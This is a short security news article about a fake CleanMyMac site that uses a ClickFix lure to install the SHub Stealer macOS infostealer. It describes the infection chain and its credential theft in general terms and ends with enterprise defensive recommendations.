CleanMyMac Imposter Site Installs SHub Stealer on Macs

The rise of macOS‑focused infostealers reflects attackers’ growing confidence in exploiting the platform’s perceived security. By mimicking a trusted utility, the fake CleanMyMac page leverages a technique known as ClickFix, where victims voluntarily execute a base64‑encoded command. This approach sidesteps traditional gatekeepers because the payload runs under the user’s privileges, rendering signature‑based defenses largely ineffective. Analysts note that such campaigns are increasingly sophisticated, embedding legitimate‑looking terminal output and immediate script piping to mask malicious activity.

Technical dissection of SHub Stealer reveals a multi‑stage infection chain. After the initial command, a loader performs system fingerprinting, aborting on Russian‑language keyboards—a clear geofencing tactic to evade law‑enforcement scrutiny in CIS regions. Successful infections proceed to harvest a breadth of credentials: macOS login passwords, Keychain secrets, browser cookies, and private keys from popular crypto wallets like MetaMask and Ledger. The malware then compresses the data and exfiltrates it via encrypted channels, giving threat actors a rich trove of financial and personal information.

For enterprises, the incident is a stark reminder that endpoint security must extend beyond app notarization. Deploying mobile device management (MDM) with strict allow‑listing, coupled with robust EDR/XDR solutions, can intercept unauthorized shell scripts before execution. Network‑level controls, such as DNS filtering and outbound traffic monitoring, further limit data exfiltration. As attackers continue to weaponize social engineering against macOS, adopting a zero‑trust posture—verifying every command and script—will be essential to protect both corporate and consumer ecosystems.